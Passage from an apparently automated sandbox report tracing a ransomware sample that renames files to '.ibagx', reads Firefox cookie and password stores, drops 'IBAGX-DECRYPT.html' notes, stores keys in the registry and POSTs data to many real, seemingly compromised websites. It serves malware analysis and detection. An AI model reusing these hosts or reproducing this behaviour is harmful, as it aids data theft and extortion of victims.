Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.htm.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.htm True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.htm.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.htm True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Green Bubbles.htm.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Green Bubbles.htm True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Hand Prints.htm.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Hand Prints.htm True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Orange Circles.htm.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Orange Circles.htm True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.htm.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.htm True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.htm.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.htm True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Shades of Blue.htm.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Shades of Blue.htm True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Soft Blue.htm.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Soft Blue.htm True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.htm.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.htm True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.MSMessageStore.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.MSMessageStore True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.pat.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.pat True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Settings.ini.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Settings.ini True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Temp\ConfigureMachine.log.ibagx source_filename = C:\Users\Default\AppData\Local\Temp\ConfigureMachine.log True 1
Fn
Move \??\C:\Users\Default\AppData\Roaming\Microsoft\Protect\CREDHIST.ibagx source_filename = C:\Users\Default\AppData\Roaming\Microsoft\Protect\CREDHIST True 1
Fn
Move \??\C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\7c86938c-9ade-44b2-a1b9-d6e5269c7ffa.ibagx source_filename = C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\7c86938c-9ade-44b2-a1b9-d6e5269c7ffa True 1
Fn
Move \??\C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\Preferred.ibagx source_filename = C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\Preferred True 1
Fn
Move \??\C:\Users\Default\Contacts\Administrator.contact.ibagx source_filename = C:\Users\Default\Contacts\Administrator.contact True 1
Fn
Move \??\C:\Users\Default\Favorites\Links\Web Slice Gallery.url.ibagx source_filename = C:\Users\Default\Favorites\Links\Web Slice Gallery.url True 1
Fn
Move \??\C:\Users\Default\Favorites\Microsoft Websites\IE Add-on site.url.ibagx source_filename = C:\Users\Default\Favorites\Microsoft Websites\IE Add-on site.url True 1
Fn
Move \??\C:\Users\Default\Favorites\Microsoft Websites\IE site on Microsoft.com.url.ibagx source_filename = C:\Users\Default\Favorites\Microsoft Websites\IE site on Microsoft.com.url True 1
Fn
Move \??\C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Home.url.ibagx source_filename = C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Home.url True 1
Fn
Move \??\C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Work.url.ibagx source_filename = C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Work.url True 1
Fn
Move \??\C:\Users\Default\Favorites\Microsoft Websites\Microsoft Store.url.ibagx source_filename = C:\Users\Default\Favorites\Microsoft Websites\Microsoft Store.url True 1
Fn
Move \??\C:\Users\Default\Favorites\MSN Websites\MSN Autos.url.ibagx source_filename = C:\Users\Default\Favorites\MSN Websites\MSN Autos.url True 1
Fn
Move \??\C:\Users\Default\Favorites\MSN Websites\MSN Entertainment.url.ibagx source_filename = C:\Users\Default\Favorites\MSN Websites\MSN Entertainment.url True 1
Fn
Move \??\C:\Users\Default\Favorites\MSN Websites\MSN Money.url.ibagx source_filename = C:\Users\Default\Favorites\MSN Websites\MSN Money.url True 1
Fn
Move \??\C:\Users\Default\Favorites\MSN Websites\MSN Sports.url.ibagx source_filename = C:\Users\Default\Favorites\MSN Websites\MSN Sports.url True 1
Fn
Move \??\C:\Users\Default\Favorites\MSN Websites\MSN.url.ibagx source_filename = C:\Users\Default\Favorites\MSN Websites\MSN.url True 1
Fn
Move \??\C:\Users\Default\Favorites\MSN Websites\MSNBC News.url.ibagx source_filename = C:\Users\Default\Favorites\MSN Websites\MSNBC News.url True 1
Fn
Move \??\C:\Users\Default\Favorites\Windows Live\Get Windows Live.url.ibagx source_filename = C:\Users\Default\Favorites\Windows Live\Get Windows Live.url True 1
Fn
Move \??\C:\Users\Default\Favorites\Windows Live\Windows Live Gallery.url.ibagx source_filename = C:\Users\Default\Favorites\Windows Live\Windows Live Gallery.url True 1
Fn
Move \??\C:\Users\Default\Favorites\Windows Live\Windows Live Mail.url.ibagx source_filename = C:\Users\Default\Favorites\Windows Live\Windows Live Mail.url True 1
Fn
Move \??\C:\Users\Default\Favorites\Windows Live\Windows Live Spaces.url.ibagx source_filename = C:\Users\Default\Favorites\Windows Live\Windows Live Spaces.url True 1
Fn
Move \??\C:\Users\Default\NTUSER.DAT.LOG1.ibagx source_filename = C:\Users\Default\NTUSER.DAT.LOG1 True 1
Fn
Move \??\C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf.ibagx source_filename = C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf True 1
Fn
Move \??\C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms.ibagx source_filename = C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms True 1
Fn
Move \??\C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms.ibagx source_filename = C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms True 1
Fn
Move \??\C:\Users\Default\ntuser.ini.ibagx source_filename = C:\Users\Default\ntuser.ini True 1
Fn
Move \??\C:\Users\EEBsYm5\AppData\Roaming\-vZCBx3T8O8PG8Z7.rtf.ibagx source_filename = C:\Users\EEBsYm5\AppData\Roaming\-vZCBx3T8O8PG8Z7.rtf True 1
Fn
Move \??\C:\Users\EEBsYm5\AppData\Roaming\0IDnC0H9EMmV.mp4.ibagx source_filename = C:\Users\EEBsYm5\AppData\Roaming\0IDnC0H9EMmV.mp4 True 1
Fn
Move \??\C:\Users\EEBsYm5\AppData\Roaming\40id.mkv.ibagx source_filename = C:\Users\EEBsYm5\AppData\Roaming\40id.mkv True 1
Fn
Move \??\C:\Users\EEBsYm5\AppData\Roaming\41xTLbSy8hho.jpg.ibagx source_filename = C:\Users\EEBsYm5\AppData\Roaming\41xTLbSy8hho.jpg True 1
Fn
Move \??\C:\Users\EEBsYm5\AppData\Roaming\5TbJjRTqQcJAG8oUNN.m4a.ibagx source_filename = C:\Users\EEBsYm5\AppData\Roaming\5TbJjRTqQcJAG8oUNN.m4a True 1
Fn
Move \??\C:\Users\EEBsYm5\AppData\Roaming\ABdV76mhVKc67XfMG.odp.ibagx source_filename = C:\Users\EEBsYm5\AppData\Roaming\ABdV76mhVKc67XfMG.odp True 1
Fn
Move \??\C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js.ibagx source_filename = C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js True 1
Fn
Move \??\C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite.ibagx source_filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite True 1
Fn
Move \??\C:\Users\EEBsYm5\AppData\Roaming\z5AcyaMPE1VuXrO.bmp.ibagx source_filename = C:\Users\EEBsYm5\AppData\Roaming\z5AcyaMPE1VuXrO.bmp True 1
Fn
Read C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite size = 1048576, size_out = 524288 True 1
Fn
Data
Read C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key3.db size = 1048576, size_out = 16384 True 1
Fn
Data
Read C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\places.sqlite size = 1048576, size_out = 1048576 True 1
Fn
Data
Read C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite size = 1048576, size_out = 327680 True 1
Fn
Data
Write C:\Program Files\\IBAGX-DECRYPT.html size = 65302 True 1
Fn
Data
Write C:\Program Files\Microsoft SQL Server Compact Edition\\IBAGX-DECRYPT.html size = 65302 True 1
Fn
Data
Write C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\\IBAGX-DECRYPT.html size = 65302 True 1
Fn
Data
Write C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\Desktop\\IBAGX-DECRYPT.html size = 65302 True 1
Fn
Data
Write C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\\IBAGX-DECRYPT.html size = 65302 True 1
Fn
Data
Write C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\My\\IBAGX-DECRYPT.html size = 65302 True 1
Fn
Data
Write C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\IBAGX-DECRYPT.html size = 65302 True 1
Fn
Data
Write C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\IBAGX-DECRYPT.html size = 65302 True 1
Fn
Data
Write C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\IBAGX-DECRYPT.html size = 65302 True 1
Fn
Data
For performance reasons, the remaining 1719 entries are omitted.
The remaining entries can be found in glog.xml.
Registry (42)
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\SOFTWARE\ex_data\data - True 1
Fn
Create Key HKEY_CURRENT_USER\SOFTWARE\keys_data\data - True 1
Fn
Open Key HKEY_CURRENT_USER\Keyboard Layout\Preload - True 8
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_CURRENT_USER\Control Panel\International - True 1
Fn
Open Key HKEY_CURRENT_USER\Keyboard Layout\Preload - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\keys_data\data - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 1, data = 48 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 2, data = 48 False 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 3, data = 48 False 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 4, data = 48 False 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 5, data = 48 False 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 6, data = 48 False 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 7, data = 48 False 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 8, data = 48 False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_CURRENT_USER\Control Panel\International value_name = LocaleName, data = 101 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 1, data = 48 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 2, data = 48 False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = productName, data = 87 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 120 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 120 True 1
Fn
Write Value HKEY_CURRENT_USER\SOFTWARE\ex_data\data value_name = ext, size = 14, type = REG_BINARY True 1
Fn
Data
Write Value HKEY_CURRENT_USER\SOFTWARE\keys_data\data value_name = public, size = 276, type = REG_BINARY True 1
Fn
Data
Write Value HKEY_CURRENT_USER\SOFTWARE\keys_data\data value_name = private, size = 1688, type = REG_BINARY True 1
Fn
Data
Process (2)
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\wbem\wmic.exe show_window = SW_HIDE True 1
Fn
Open System Idle Process - False 1
Fn
Module (1666)
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\ntdll.dll base_address = 0x77230000 True 3
Fn
Get Handle c:\windows\system32\advapi32.dll base_address = 0x769f0000 True 830
Fn
Get Address c:\windows\system32\ntdll.dll function = RtlComputeCrc32, address_out = 0x7723dd8a True 2
Fn
Get Address c:\windows\system32\advapi32.dll function = CryptGenRandom, address_out = 0x769fdfc8 True 830
Fn
Get Address c:\windows\system32\ntdll.dll function = NtSetInformationFile, address_out = 0x77276638 True 1
Fn
System (496)
Operation Additional Information Success Count Logfile
Get Computer Name result_out = CRH2YWU7 True 2
Fn
Sleep duration = -1 (infinite) True 1
Fn
Get Time type = Ticks, time = 142709 True 1
Fn
Get Time type = System Time, time = 2018-09-24 10:36:05 (UTC) True 13
Fn
Get Time type = System Time, time = 2018-09-24 10:36:07 (UTC) True 13
Fn
Get Time type = System Time, time = 2018-09-24 10:36:08 (UTC) True 6
Fn
Get Time type = System Time, time = 2018-09-24 10:36:09 (UTC) True 4
Fn
Get Time type = System Time, time = 2018-09-24 10:36:10 (UTC) True 2
Fn
Get Time type = System Time, time = 2018-09-24 10:36:11 (UTC) True 1
Fn
Get Time type = System Time, time = 2018-09-24 10:36:13 (UTC) True 1
Fn
Get Time type = System Time, time = 2018-09-24 10:36:16 (UTC) True 21
Fn
Get Time type = System Time, time = 2018-09-24 10:36:17 (UTC) True 10
Fn
Get Time type = System Time, time = 2018-09-24 10:36:18 (UTC) True 2
Fn
Get Time type = System Time, time = 2018-09-24 10:36:19 (UTC) True 4
Fn
Get Time type = System Time, time = 2018-09-24 10:36:20 (UTC) True 21
Fn
Get Time type = System Time, time = 2018-09-24 10:36:21 (UTC) True 6
Fn
Get Time type = System Time, time = 2018-09-24 10:36:22 (UTC) True 6
Fn
Get Time type = System Time, time = 2018-09-24 10:36:23 (UTC) True 7
Fn
Get Time type = System Time, time = 2018-09-24 10:36:24 (UTC) True 4
Fn
Get Time type = System Time, time = 2018-09-24 10:36:25 (UTC) True 17
Fn
Get Time type = System Time, time = 2018-09-24 10:36:26 (UTC) True 16
Fn
Get Time type = System Time, time = 2018-09-24 10:36:27 (UTC) True 7
Fn
Get Time type = System Time, time = 2018-09-24 10:36:28 (UTC) True 17
Fn
Get Time type = System Time, time = 2018-09-24 10:36:29 (UTC) True 1
Fn
Get Time type = System Time, time = 2018-09-24 10:36:30 (UTC) True 5
Fn
Get Time type = System Time, time = 2018-09-24 10:36:33 (UTC) True 1
Fn
Get Time type = System Time, time = 2018-09-24 10:36:34 (UTC) True 4
Fn
Get Time type = System Time, time = 2018-09-24 10:36:35 (UTC) True 4
Fn
Get Time type = System Time, time = 2018-09-24 10:36:36 (UTC) True 1
Fn
Get Time type = System Time, time = 2018-09-24 10:36:37 (UTC) True 6
Fn
Get Time type = System Time, time = 2018-09-24 10:36:38 (UTC) True 4
Fn
Get Time type = System Time, time = 2018-09-24 10:36:39 (UTC) True 4
Fn
Get Time type = System Time, time = 2018-09-24 10:36:41 (UTC) True 8
Fn
Get Time type = System Time, time = 2018-09-24 10:36:42 (UTC) True 9
Fn
Get Time type = System Time, time = 2018-09-24 10:36:43 (UTC) True 11
Fn
Get Time type = System Time, time = 2018-09-24 10:36:44 (UTC) True 1
Fn
Get Time type = System Time, time = 2018-09-24 10:36:45 (UTC) True 1
Fn
Get Time type = System Time, time = 2018-09-24 10:36:47 (UTC) True 2
Fn
Get Time type = System Time, time = 2018-09-24 10:36:50 (UTC) True 2
Fn
Get Time type = Ticks, time = 189229 True 1
Fn
Get Time type = Ticks, time = 190321 True 1
Fn
Get Info type = Windows Directory, result_out = C:\Windows True 245
Fn
Get Info type = Hardware Information True 2
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Mutex (2)
Operation Additional Information Success Count Logfile
Create mutex_name = Global\8B5BA8B9F369050F5F4C.lock True 1
Fn
Open mutex_name = Global\XlAKFoxSKGOfSGOoSFOOFNOLPE, desired_access = SYNCHRONIZE False 1
Fn
Network Behavior
HTTP Sessions (59)
Information Value
Total Data Sent 14.22 KB
Total Data Received 72 bytes
Contacted Host Count 30
Contacted Hosts www.billerimpex.com, www.macartegrise.eu, www.poketeg.com, perovaphoto.ru, asl-company.ru, www.fabbfoundation.gm, www.perfectfunnelblueprint.com, www.wash-wear.com, pp-panda74.ru, cevent.net, bellytobabyphotographyseattle.com, alem.be, boatshowradio.com, dna-cp.com, acbt.fr, wpakademi.com, www.cakav.hu, www.mimid.cz, 6chen.cn, goodapd.website, oceanlinen.com, tommarmores.com.br, nesten.dk, zaeba.co.uk, www.n2plus.co.th, koloritplus.ru, h5s.vn, marketisleri.com, www.toflyaviacao.com.br, www.rment.in
HTTP Session #1
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.billerimpex.com
Server Port 80
Data Sent 244
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.billerimpex.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = www.billerimpex.com/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #2
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.billerimpex.com
Server Port 443
Data Sent 269
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.billerimpex.com, server_port = 443 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = content/image/dekese.png, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = www.billerimpex.com/content/image/dekese.png True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #3
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.macartegrise.eu
Server Port 80
Data Sent 242
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.macartegrise.eu, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = www.macartegrise.eu/ False 1
Fn
HTTP Session #4
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.macartegrise.eu
Server Port 80
Data Sent 266
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.macartegrise.eu, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = uploads/images/zuhe.gif, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = www.macartegrise.eu/uploads/images/zuhe.gif False 1
Fn
Close Session - True 58
Fn
HTTP Session #5
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.poketeg.com
Server Port 80
Data Sent 234
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.poketeg.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = www.poketeg.com/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #6
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.poketeg.com
Server Port 80
Data Sent 257
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.poketeg.com, server_port = 80 True 1
Fn
